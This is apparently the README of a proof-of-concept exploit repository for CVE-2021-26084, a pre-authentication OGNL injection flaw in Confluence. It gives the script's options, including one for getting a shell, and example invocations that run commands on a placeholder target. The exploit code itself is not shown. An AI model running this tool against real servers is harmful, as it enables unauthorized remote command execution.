CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
### Usage
- ```
usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell]
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection
optional arguments:
-h, --help show this help message and exit
--url URL, -u URL Target Url
--cmd CMD, -c CMD Command
--shell Get shell
```
- ```
python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "whoami"
```

- ```
python3 cve-2021-26084_confluence_rce.py -u http://target:8090 -c "cmd.exe /c dir"
```

### Reference:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
[4.0K] /data/pocs/eee577351090d098fa91dec09d4a9ef6ab3a6cfa
├── [2.6K] cve-2021-26084_confluence_rce.py
├── [4.0K] img
│ ├── [ 11K] 1630484082986.png
│ └── [ 38K] 1630484112292.png
└── [ 757] README.md
1 directory, 4 files